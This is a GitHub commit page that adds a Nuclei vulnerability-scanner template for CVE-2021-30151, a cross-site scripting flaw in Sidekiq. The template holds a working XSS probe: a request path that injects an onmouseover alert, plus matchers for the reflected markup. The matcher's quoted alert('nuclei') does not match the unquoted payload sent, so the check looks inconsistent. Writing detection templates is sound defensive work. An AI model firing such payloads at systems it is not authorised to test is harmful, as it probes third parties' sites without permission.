Merge pull request #1250 from DhiyaneshGeek/master

CVE-2021-30151
patch-1
PD-Team 2021-04-11 17:55:49 +05:30 committed by GitHub
commit a5f19bdf4f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2021-30151
info:
name: CVE-2021-30151
author: DhiyaneshDk
severity: low
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
reference: |
- https://github.com/mperham/sidekiq/issues/4852
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
tags: cve,cve2021,xss,sidekiq
requests:
- method: GET
path:
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover=\"alert('nuclei')"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200